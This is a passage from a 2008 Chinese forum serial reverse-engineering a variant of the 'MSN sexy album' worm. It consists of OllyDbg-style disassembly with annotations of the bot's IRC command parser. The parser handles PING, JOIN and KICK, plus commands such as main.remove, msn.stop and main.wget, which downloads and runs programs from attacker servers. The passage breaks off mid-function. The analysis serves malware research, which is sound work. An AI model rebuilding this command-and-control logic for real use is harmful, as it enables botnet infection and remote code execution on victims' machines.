[连载] 蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料

Simen.Resh@d · 发表于 2008-6-15 12:56:04

解析从骇客服务器反回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作(由于此函数内部代码过于烦琐，所以相应的省略了部分注解)：
004015E9 55             PUSH EBP
004015EA 8BEC          MOV EBP,ESP
004015EC 81EC B40B0000 SUB ESP,0BB4
004015F2 57             PUSH EDI
004015F3 83A5 64FEFFFF 0>AND DWORD PTR SS:[EBP-19C],0
004015FA 6A 63          PUSH 63
004015FC 59             POP ECX
004015FD 33C0          XOR EAX,EAX
004015FF 8DBD 68FEFFFF LEA EDI,DWORD PTR SS:[EBP-198]
00401605 F3:AB          REP STOS DWORD PTR ES:[EDI]
00401607 8365 F4 00    AND DWORD PTR SS:[EBP-C],0
0040160B 68 14914000    PUSH waccs.00409114
00401610 FF75 0C       PUSH DWORD PTR SS:[EBP+C]
00401613 E8 3A5A0000    CALL waccs.00407052                   ; JMP 到 msvcrt.strstr
00401618 59             POP ECX
00401619 59             POP ECX
0040161A 8945 F8       MOV DWORD PTR SS:[EBP-8],EAX
0040161D 837D F8 00    CMP DWORD PTR SS:[EBP-8],0
00401621 74 23          JE SHORT waccs.00401646
00401623 8B45 F8       MOV EAX,DWORD PTR SS:[EBP-8]
00401626 8020 00       AND BYTE PTR DS:[EAX],0
00401629 8B45 F4       MOV EAX,DWORD PTR SS:[EBP-C]
0040162C 8B4D 0C       MOV ECX,DWORD PTR SS:[EBP+C]
0040162F 898C85 64FEFFFF MOV DWORD PTR SS:[EBP+EAX*4-19C],ECX
00401636 8B45 F8       MOV EAX,DWORD PTR SS:[EBP-8]
00401639 40             INC EAX
0040163A 8945 0C       MOV DWORD PTR SS:[EBP+C],EAX
0040163D 8B45 F4       MOV EAX,DWORD PTR SS:[EBP-C]
00401640 40             INC EAX
00401641 8945 F4       MOV DWORD PTR SS:[EBP-C],EAX
00401644 ^ EB C5          JMP SHORT waccs.0040160B
00401646 8B45 F4       MOV EAX,DWORD PTR SS:[EBP-C]
00401649 8B4D 0C       MOV ECX,DWORD PTR SS:[EBP+C]
0040164C 898C85 64FEFFFF MOV DWORD PTR SS:[EBP+EAX*4-19C],ECX
00401653 C745 FC 0400000>MOV DWORD PTR SS:[EBP-4],4
0040165A 83BD 64FEFFFF 0>CMP DWORD PTR SS:[EBP-19C],0
00401661 74 09          JE SHORT waccs.0040166C
00401663 83BD 68FEFFFF 0>CMP DWORD PTR SS:[EBP-198],0
0040166A 75 05          JNZ SHORT waccs.00401671
0040166C E9 22080000    JMP waccs.00401E93
00401671 FFB5 64FEFFFF PUSH DWORD PTR SS:[EBP-19C]
00401677 68 5D2573B7    PUSH B773255D
0040167C 8D8D 00F5FFFF LEA ECX,DWORD PTR SS:[EBP-B00]
00401682 E8 CF0F0000    CALL waccs.00402656                   ; ASCII "PING"
00401687 50             PUSH EAX
00401688 E8 155A0000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"PING").
0040168D 59             POP ECX
0040168E 59             POP ECX
0040168F F7D8          NEG EAX
00401691 1BC0          SBB EAX,EAX
00401693 40             INC EAX
00401694 8885 08F5FFFF MOV BYTE PTR SS:[EBP-AF8],AL
0040169A 8D8D 00F5FFFF LEA ECX,DWORD PTR SS:[EBP-B00]
004016A0 E8 81090000    CALL waccs.00402026                   ; 清除内存数据.
004016A5 0FB685 08F5FFFF MOVZX EAX,BYTE PTR SS:[EBP-AF8]
004016AC 85C0          TEST EAX,EAX
004016AE 74 3F          JE SHORT waccs.004016EF                ; 判断是否该执行"PING"命令.
004016B0 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
004016B3 05 BA000000    ADD EAX,0BA
004016B8 50             PUSH EAX
004016B9 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
004016BC 05 A1000000    ADD EAX,0A1
004016C1 50             PUSH EAX
004016C2 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198]
004016C8 68 5BF5ABE4    PUSH E4ABF55B
004016CD 8D8D F8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B08]
004016D3 E8 DE0F0000    CALL waccs.004026B6                   ; ASCII "PONG %s"
004016D8 50             PUSH EAX
004016D9 FF75 08       PUSH DWORD PTR SS:[EBP+8]
004016DC E8 1FF9FFFF    CALL waccs.00401000                   ; 构造发送数据包(格式："PONG %s").
004016E1 83C4 14       ADD ESP,14
004016E4 8D8D F8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B08]
004016EA E8 E7080000    CALL waccs.00401FD6                   ; 清除内存数据.
004016EF FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198]
004016F5 68 1B2CF4BE    PUSH BEF42C1B
004016FA 8D8D F0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B10]
00401700 E8 11100000    CALL waccs.00402716                   ; ASCII "001"
00401705 50             PUSH EAX
00401706 E8 97590000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"001").
0040170B 59             POP ECX
0040170C 59             POP ECX
0040170D F7D8          NEG EAX
0040170F 1BC0          SBB EAX,EAX
00401711 40             INC EAX
00401712 8885 F4F4FFFF MOV BYTE PTR SS:[EBP-B0C],AL
00401718 8D8D F0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B10]
0040171E E8 2B090000    CALL waccs.0040204E                   ; 清除内存数据.
00401723 0FB685 F4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B0C]
0040172A 85C0          TEST EAX,EAX
0040172C 74 39          JE SHORT waccs.00401767                ; 判断是否该执行"001"命令.
0040172E 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401731 05 BA000000    ADD EAX,0BA
00401736 50             PUSH EAX
00401737 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
0040173A 05 A1000000    ADD EAX,0A1
0040173F 50             PUSH EAX
00401740 68 CCADB02E    PUSH 2EB0ADCC
00401745 8D8D E4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B1C]
0040174B E8 26100000    CALL waccs.00402776                   ; ASCII "JOIN %s %s".
00401750 50             PUSH EAX
00401751 FF75 08       PUSH DWORD PTR SS:[EBP+8]
00401754 E8 A7F8FFFF    CALL waccs.00401000                   ; 构造发送数据包(格式："JOIN %s %s").
00401759 83C4 10       ADD ESP,10
0040175C 8D8D E4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B1C]
00401762 E8 0F090000    CALL waccs.00402076                   ; 清除内存数据.
00401767 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198]
0040176D 68 3B99B737    PUSH 37B7993B
00401772 8D8D D8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B28]
00401778 E8 59100000    CALL waccs.004027D6                   ; ASCII "KICK"
0040177D 50             PUSH EAX
0040177E E8 1F590000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"KICK").
00401783 59             POP ECX
00401784 59             POP ECX
00401785 85C0          TEST EAX,EAX
00401787 75 64          JNZ SHORT waccs.004017ED
00401789 FFB5 6CFEFFFF PUSH DWORD PTR SS:[EBP-194]
0040178F 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401792 05 A1000000    ADD EAX,0A1
00401797 50             PUSH EAX
00401798 E8 05590000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(近一步指令识别,判断指令只否为"##ghetto##").
0040179D 59             POP ECX
0040179E 59             POP ECX
0040179F F7D8          NEG EAX
004017A1 1BC0          SBB EAX,EAX
004017A3 40             INC EAX
004017A4 8885 D4F4FFFF MOV BYTE PTR SS:[EBP-B2C],AL
004017AA 0FB685 D4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B2C]
004017B1 85C0          TEST EAX,EAX
004017B3 74 38          JE SHORT waccs.004017ED
004017B5 FFB5 70FEFFFF PUSH DWORD PTR SS:[EBP-190]
004017BB 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
004017BE 05 EC000000    ADD EAX,0EC
004017C3 50             PUSH EAX
004017C4 E8 D9580000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(近一步指令识别).
004017C9 59             POP ECX
004017CA 59             POP ECX
004017CB F7D8          NEG EAX
004017CD 1BC0          SBB EAX,EAX
004017CF 40             INC EAX
004017D0 8885 D0F4FFFF MOV BYTE PTR SS:[EBP-B30],AL
004017D6 0FB685 D0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B30]
004017DD 85C0          TEST EAX,EAX
004017DF 74 0C          JE SHORT waccs.004017ED
004017E1 C785 50F4FFFF 0>MOV DWORD PTR SS:[EBP-BB0],1
004017EB EB 07          JMP SHORT waccs.004017F4
004017ED 83A5 50F4FFFF 0>AND DWORD PTR SS:[EBP-BB0],0
004017F4 8A85 50F4FFFF MOV AL,BYTE PTR SS:[EBP-BB0]
004017FA 8885 E0F4FFFF MOV BYTE PTR SS:[EBP-B20],AL
00401800 8D8D D8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B28]
00401806 E8 1B080000    CALL waccs.00402026                   ; 清除内存数据.
0040180B 0FB685 E0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B20]
00401812 85C0          TEST EAX,EAX
00401814 74 39          JE SHORT waccs.0040184F                ; 判断是否该执行"KICK"命令.
00401816 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401819 05 BA000000    ADD EAX,0BA
0040181E 50             PUSH EAX
0040181F 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401822 05 A1000000    ADD EAX,0A1
00401827 50             PUSH EAX
00401828 68 8CA52F28    PUSH 282FA58C
0040182D 8D8D C4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B3C]
00401833 E8 FE0F0000    CALL waccs.00402836                   ; ASCII "JOIN %s %s"
00401838 50             PUSH EAX
00401839 FF75 08       PUSH DWORD PTR SS:[EBP+8]
0040183C E8 BFF7FFFF    CALL waccs.00401000                   ; 构造发送数据包.
00401841 83C4 10       ADD ESP,10
00401844 8D8D C4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B3C]
0040184A E8 27080000    CALL waccs.00402076                   ; 清除内存数据.
0040184F FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198]
00401855 68 4C914000    PUSH waccs.0040914C                   ; ASCII "332"
0040185A E8 43580000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"332").
0040185F 59             POP ECX
00401860 59             POP ECX
00401861 85C0          TEST EAX,EAX
00401863 75 0C          JNZ SHORT waccs.00401871                ; 判断是否该执行"332"命令.
00401865 C745 FC 0500000>MOV DWORD PTR SS:[EBP-4],5
0040186C E9 9C000000    JMP waccs.0040190D
00401871 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198]
00401877 68 3F38E862    PUSH 62E8383F
0040187C 8D8D B8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B48]
00401882 E8 0F100000    CALL waccs.00402896                   ; ASCII "PRIVMSG"
00401887 50             PUSH EAX
00401888 E8 15580000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"PRIVMSG").
0040188D 59             POP ECX
0040188E 59             POP ECX
0040188F 85C0          TEST EAX,EAX
00401891 74 4C          JE SHORT waccs.004018DF                ; 判断是否该执行"PRIVMSG"命令.
00401893 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198]
00401899 68 3FCE37DE    PUSH DE37CE3F
0040189E 8D8D B0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B50]
004018A4 E8 4D100000    CALL waccs.004028F6                   ; ASCII "332"
004018A9 50             PUSH EAX
004018AA E8 F3570000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"332").
004018AF 59             POP ECX
004018B0 59             POP ECX
004018B1 F7D8          NEG EAX
004018B3 1BC0          SBB EAX,EAX
004018B5 F7D8          NEG EAX
004018B7 8885 B4F4FFFF MOV BYTE PTR SS:[EBP-B4C],AL
004018BD 8D8D B0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B50]
004018C3 E8 86070000    CALL waccs.0040204E                   ; 清除内存数据.
004018C8 0FB685 B4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B4C]
004018CF 85C0          TEST EAX,EAX
004018D1 74 0C          JE SHORT waccs.004018DF                ; 判断是否该执行"332"命令.
004018D3 C785 4CF4FFFF 0>MOV DWORD PTR SS:[EBP-BB4],1
004018DD EB 07          JMP SHORT waccs.004018E6
004018DF 83A5 4CF4FFFF 0>AND DWORD PTR SS:[EBP-BB4],0
004018E6 8A85 4CF4FFFF MOV AL,BYTE PTR SS:[EBP-BB4]
004018EC 8885 C0F4FFFF MOV BYTE PTR SS:[EBP-B40],AL
004018F2 8D8D B8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B48]
004018F8 E8 D9060000    CALL waccs.00401FD6                   ; 清除内存数据.
004018FD 0FB685 C0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B40]
00401904 85C0          TEST EAX,EAX
00401906 74 05          JE SHORT waccs.0040190D
00401908 E9 86050000    JMP waccs.00401E93                      ; 返回(退出)该函数.
0040190D 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401910 8B8485 60FEFFFF MOV EAX,DWORD PTR SS:[EBP+EAX*4-1A0]
00401917 8B4D FC       MOV ECX,DWORD PTR SS:[EBP-4]
0040191A 8B8C8D 60FEFFFF MOV ECX,DWORD PTR SS:[EBP+ECX*4-1A0]
00401921 41             INC ECX
00401922 8B55 FC       MOV EDX,DWORD PTR SS:[EBP-4]
00401925 898C95 60FEFFFF MOV DWORD PTR SS:[EBP+EDX*4-1A0],ECX
0040192C 85C0          TEST EAX,EAX
0040192E 74 0D          JE SHORT waccs.0040193D
00401930 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401933 83BC85 64FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-19C],0
0040193B 75 05          JNZ SHORT waccs.00401942
0040193D E9 51050000    JMP waccs.00401E93                      ; 返回(退出)该函数.
00401942 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401945 05 EC000000    ADD EAX,0EC
0040194A 50             PUSH EAX
0040194B 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
0040194E FFB485 60FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-1A0]
00401955 E8 61250000    CALL waccs.00403EBB                   ; 数据处理.
0040195A 59             POP ECX
0040195B 59             POP ECX
0040195C 85C0          TEST EAX,EAX
0040195E 74 05          JE SHORT waccs.00401965
00401960 E9 2E050000    JMP waccs.00401E93                      ; 返回(退出)该函数.

Simen.Resh@d · 发表于 2008-6-15 12:56:26

00401965 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401968 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C]
0040196F 68 DD341F7F    PUSH 7F1F34DD
00401974 8D8D A0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B60]
0040197A E8 D70F0000    CALL waccs.00402956                   ; ASCII "main.remove"
0040197F 50             PUSH EAX
00401980 E8 1D570000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"main.remove").
00401985 59             POP ECX
00401986 59             POP ECX
00401987 F7D8          NEG EAX
00401989 1BC0          SBB EAX,EAX
0040198B 40             INC EAX
0040198C 8885 ACF4FFFF MOV BYTE PTR SS:[EBP-B54],AL
00401992 8D8D A0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B60]
00401998 E8 01070000    CALL waccs.0040209E                   ; 清除内存数据.
0040199D 0FB685 ACF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B54]
004019A4 85C0          TEST EAX,EAX
004019A6 74 4A          JE SHORT waccs.004019F2                ; 判断是否该执行"main.remove"命令.
004019A8 68 34BB33D5    PUSH D533BB34
004019AD 8D8D 90F4FFFF LEA ECX,DWORD PTR SS:[EBP-B70]
004019B3 E8 FE0F0000    CALL waccs.004029B6                   ; ASCII "QUIT :Removing"
004019B8 50             PUSH EAX
004019B9 FF75 08       PUSH DWORD PTR SS:[EBP+8]
004019BC E8 3FF6FFFF    CALL waccs.00401000                   ; 构造发送数据包.
004019C1 59             POP ECX
004019C2 59             POP ECX
004019C3 8D8D 90F4FFFF LEA ECX,DWORD PTR SS:[EBP-B70]
004019C9 E8 90050000    CALL waccs.00401F5E                   ; 清除内存数据.
004019CE FF15 E8814000 CALL DWORD PTR DS:[4081E8]             ; WS2_32.WSACleanup(清除WinSock库函数).
004019D4 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
004019D7 FFB0 0C010000 PUSH DWORD PTR DS:[EAX+10C]
004019DD FF15 74804000 CALL DWORD PTR DS:[408074]             ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体).
004019E3 6A 00          PUSH 0
004019E5 E8 86270000    CALL waccs.00404170                   ; 删除病毒在注册表中的启动项.
004019EA 59             POP ECX
004019EB E8 1D260000    CALL waccs.0040400D                   ; 主病毒体程序文件执行自我删除.
004019F0 EB 60          JMP SHORT waccs.00401A52
004019F2 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
004019F5 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C]
004019FC 68 843DBF83    PUSH 83BF3D84
00401A01 8D8D 80F4FFFF LEA ECX,DWORD PTR SS:[EBP-B80]
00401A07 E8 0A100000    CALL waccs.00402A16                   ; ASCII "msn.stop"
00401A0C 50             PUSH EAX
00401A0D E8 90560000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.stop").
00401A12 59             POP ECX
00401A13 59             POP ECX
00401A14 F7D8          NEG EAX
00401A16 1BC0          SBB EAX,EAX
00401A18 40             INC EAX
00401A19 8885 8CF4FFFF MOV BYTE PTR SS:[EBP-B74],AL
00401A1F 8D8D 80F4FFFF LEA ECX,DWORD PTR SS:[EBP-B80]
00401A25 E8 9C060000    CALL waccs.004020C6                   ; 清除内存数据.
00401A2A 0FB685 8CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B74]
00401A31 85C0          TEST EAX,EAX
00401A33 74 1D          JE SHORT waccs.00401A52                ; 判断.
00401A35 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401A38 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0
00401A3F 74 11          JE SHORT waccs.00401A52                ; 判断.
00401A41 6A 00          PUSH 0
00401A43 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401A46 FFB0 10010000 PUSH DWORD PTR DS:[EAX+110]
00401A4C FF15 70804000 CALL DWORD PTR DS:[408070]             ; kernel32.TerminateThread(结束线程).
00401A52 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401A55 83BC85 68FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-198],0
00401A5D 75 05          JNZ SHORT waccs.00401A64
00401A5F E9 2F040000    JMP waccs.00401E93                      ; 返回(退出)该函数.
00401A64 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401A67 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C]
00401A6E 68 C2143DAE    PUSH AE3D14C2
00401A73 8D8D 70F4FFFF LEA ECX,DWORD PTR SS:[EBP-B90]
00401A79 E8 F80F0000    CALL waccs.00402A76                   ; ASCII "main.wget"
00401A7E 50             PUSH EAX
00401A7F E8 1E560000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"main.wget").
00401A84 59             POP ECX
00401A85 59             POP ECX
00401A86 F7D8          NEG EAX
00401A88 1BC0          SBB EAX,EAX
00401A8A 40             INC EAX
00401A8B 8885 7CF4FFFF MOV BYTE PTR SS:[EBP-B84],AL
00401A91 8D8D 70F4FFFF LEA ECX,DWORD PTR SS:[EBP-B90]
00401A97 E8 52060000    CALL waccs.004020EE                   ; 清除内存数据.
00401A9C 0FB685 7CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B84]
00401AA3 85C0          TEST EAX,EAX
00401AA5 74 78          JE SHORT waccs.00401B1F                ; 判断是否该执行"main.wget"命令.
00401AA7 80A5 58FDFFFF 0>AND BYTE PTR SS:[EBP-2A8],0
00401AAE 68 04010000    PUSH 104
00401AB3 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401AB6 FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-198]
00401ABD 8D85 59FDFFFF LEA EAX,DWORD PTR SS:[EBP-2A7]
00401AC3 50             PUSH EAX
00401AC4 E8 D3550000    CALL waccs.0040709C                   ; JMP 到 msvcrt.strncpy
00401AC9 83C4 0C       ADD ESP,0C
00401ACC 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401ACF 8985 60FEFFFF MOV DWORD PTR SS:[EBP-1A0],EAX
00401AD5 8D85 58FDFFFF LEA EAX,DWORD PTR SS:[EBP-2A8]
00401ADB 50             PUSH EAX
00401ADC 6A 00          PUSH 0
00401ADE 68 143A4000    PUSH waccs.00403A14
00401AE3 E8 AE550000    CALL waccs.00407096                   ; JMP 到 msvcrt._beginthread(创建一个子线程，线程执行函数地址为：00403A14).(线程功能：下载骇客指定远程服务器站点的其它程序，并自动调用运行).
00401AE8 83C4 0C       ADD ESP,0C
00401AEB 83A5 54FDFFFF 0>AND DWORD PTR SS:[EBP-2AC],0
00401AF2 EB 0D          JMP SHORT waccs.00401B01
00401AF4 8B85 54FDFFFF MOV EAX,DWORD PTR SS:[EBP-2AC]
00401AFA 40             INC EAX
00401AFB 8985 54FDFFFF MOV DWORD PTR SS:[EBP-2AC],EAX
00401B01 0FB685 58FDFFFF MOVZX EAX,BYTE PTR SS:[EBP-2A8]
00401B08 85C0          TEST EAX,EAX
00401B0A 75 13          JNZ SHORT waccs.00401B1F
00401B0C 83BD 54FDFFFF 5>CMP DWORD PTR SS:[EBP-2AC],50
00401B13 7D 0A          JGE SHORT waccs.00401B1F
00401B15 6A 19          PUSH 19
00401B17 FF15 6C804000 CALL DWORD PTR DS:[40806C]             ; kernel32.Sleep(等待).
00401B1D ^ EB D5          JMP SHORT waccs.00401AF4
00401B1F 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401B22 83BC85 70FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-190],0
00401B2A 75 05          JNZ SHORT waccs.00401B31
00401B2C E9 62030000    JMP waccs.00401E93                      ; 返回(退出)该函数.
00401B31 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401B34 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C]
00401B3B 68 4378F788    PUSH 88F77843
00401B40 8D8D 60F4FFFF LEA ECX,DWORD PTR SS:[EBP-BA0]
00401B46 E8 8B0F0000    CALL waccs.00402AD6                   ; ASCII "msn.self"
00401B4B 50             PUSH EAX
00401B4C E8 51550000    CALL waccs.004070A2                   ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.self").
00401B51 59             POP ECX
00401B52 59             POP ECX
00401B53 F7D8          NEG EAX
00401B55 1BC0          SBB EAX,EAX
00401B57 40             INC EAX
00401B58 8885 6CF4FFFF MOV BYTE PTR SS:[EBP-B94],AL
00401B5E 8D8D 60F4FFFF LEA ECX,DWORD PTR SS:[EBP-BA0]
00401B64 E8 5D050000    CALL waccs.004020C6                   ; 清除内存数据.
00401B69 0FB685 6CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B94]
00401B70 85C0          TEST EAX,EAX
00401B72 0F84 52010000 JE waccs.00401CCA                      ; 判断是否该执行"msn.self"命令.
00401B78 68 20040000    PUSH 420
00401B7D 6A 00          PUSH 0
00401B7F 8D85 34F9FFFF LEA EAX,DWORD PTR SS:[EBP-6CC]
00401B85 50             PUSH EAX
00401B86 E8 AF540000    CALL waccs.0040703A                   ; JMP 到 msvcrt.memset
00401B8B 83C4 0C       ADD ESP,0C
00401B8E 80A5 34F9FFFF 0>AND BYTE PTR SS:[EBP-6CC],0
00401B95 68 04010000    PUSH 104
00401B9A 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401B9D FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-198]
00401BA4 8D85 41FCFFFF LEA EAX,DWORD PTR SS:[EBP-3BF]
00401BAA 50             PUSH EAX
00401BAB E8 EC540000    CALL waccs.0040709C                   ; JMP 到 msvcrt.strncpy
00401BB0 83C4 0C       ADD ESP,0C
00401BB3 68 04010000    PUSH 104
00401BB8 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401BBB FFB485 6CFEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-194]
00401BC2 8D85 39FAFFFF LEA EAX,DWORD PTR SS:[EBP-5C7]
00401BC8 50             PUSH EAX
00401BC9 E8 CE540000    CALL waccs.0040709C                   ; JMP 到 msvcrt.strncpy
00401BCE 83C4 0C       ADD ESP,0C
00401BD1 68 04010000    PUSH 104
00401BD6 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401BD9 FFB485 70FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-190]
00401BE0 8D85 3DFBFFFF LEA EAX,DWORD PTR SS:[EBP-4C3]
00401BE6 50             PUSH EAX
00401BE7 E8 B0540000    CALL waccs.0040709C                   ; JMP 到 msvcrt.strncpy
00401BEC 83C4 0C       ADD ESP,0C
00401BEF 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401BF2 83BC85 74FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-18C],0
00401BFA 74 41          JE SHORT waccs.00401C3D
00401BFC 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401BFF 83BC85 78FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-188],0
00401C07 74 34          JE SHORT waccs.00401C3D
00401C09 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401C0C FFB485 74FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-18C]
00401C13 E8 78540000    CALL waccs.00407090                   ; JMP 到 msvcrt.atoi
00401C18 59             POP ECX
00401C19 8985 48FDFFFF MOV DWORD PTR SS:[EBP-2B8],EAX
00401C1F 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401C22 FFB485 78FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-188]
00401C29 E8 62540000    CALL waccs.00407090                   ; JMP 到 msvcrt.atoi
00401C2E 59             POP ECX
00401C2F 69C0 60EA0000 IMUL EAX,EAX,0EA60
00401C35 8985 4CFDFFFF MOV DWORD PTR SS:[EBP-2B4],EAX
00401C3B EB 14          JMP SHORT waccs.00401C51
00401C3D C785 48FDFFFF 0>MOV DWORD PTR SS:[EBP-2B8],1
00401C47 C785 4CFDFFFF F>MOV DWORD PTR SS:[EBP-2B4],0FA
00401C51 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401C54 8985 50FDFFFF MOV DWORD PTR SS:[EBP-2B0],EAX
00401C5A 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401C5D 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0
00401C64 74 11          JE SHORT waccs.00401C77
00401C66 6A 00          PUSH 0
00401C68 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
00401C6B FFB0 10010000 PUSH DWORD PTR DS:[EAX+110]
00401C71 FF15 70804000 CALL DWORD PTR DS:[408070]             ; kernel32.TerminateThread(结束线程).
00401C77 8D85 34F9FFFF LEA EAX,DWORD PTR SS:[EBP-6CC]
00401C7D 50             PUSH EAX
00401C7E 6A 00          PUSH 0
00401C80 68 FE4C4000    PUSH waccs.00404CFE
00401C85 E8 0C540000    CALL waccs.00407096                   ; JMP 到 msvcrt._beginthread(创建一个子线程，线程执行函数地址为：00404CFE).(线程功能：建立连接，访问远程网站信息，下载和删除指定文件等操作).
00401C8A 83C4 0C       ADD ESP,0C
00401C8D 8B4D 08       MOV ECX,DWORD PTR SS:[EBP+8]
00401C90 8981 10010000 MOV DWORD PTR DS:[ECX+110],EAX
00401C96 83A5 30F9FFFF 0>AND DWORD PTR SS:[EBP-6D0],0
00401C9D EB 0D          JMP SHORT waccs.00401CAC
00401C9F 8B85 30F9FFFF MOV EAX,DWORD PTR SS:[EBP-6D0]
00401CA5 40             INC EAX
00401CA6 8985 30F9FFFF MOV DWORD PTR SS:[EBP-6D0],EAX
00401CAC 0FB685 34F9FFFF MOVZX EAX,BYTE PTR SS:[EBP-6CC]
00401CB3 85C0          TEST EAX,EAX
00401CB5 75 13          JNZ SHORT waccs.00401CCA
00401CB7 83BD 30F9FFFF 5>CMP DWORD PTR SS:[EBP-6D0],50
00401CBE 7D 0A          JGE SHORT waccs.00401CCA
00401CC0 6A 19          PUSH 19
00401CC2 FF15 6C804000 CALL DWORD PTR DS:[40806C]             ; kernel32.Sleep(等待).
00401CC8 ^ EB D5          JMP SHORT waccs.00401C9F
00401CCA 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401CCD 83BC85 74FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-18C],0
00401CD5 75 05          JNZ SHORT waccs.00401CDC
00401CD7 E9 B7010000    JMP waccs.00401E93                      ; 返回(退出)该函数.

Simen.Resh@d · 发表于 2008-6-15 12:56:44

00401CDC 8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]
00401CDF FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C]
00401CE6 68 D7A57E24    PUSH 247EA5D7
00401CEB 8D8D 54F4FFFF LEA ECX,DWORD PTR SS:[EBP-BAC]
00401CF1 E8 400E0000    CALL waccs.00402B36                   ; ASCII "msn.url"
00401CF6 50             PUSH EAX
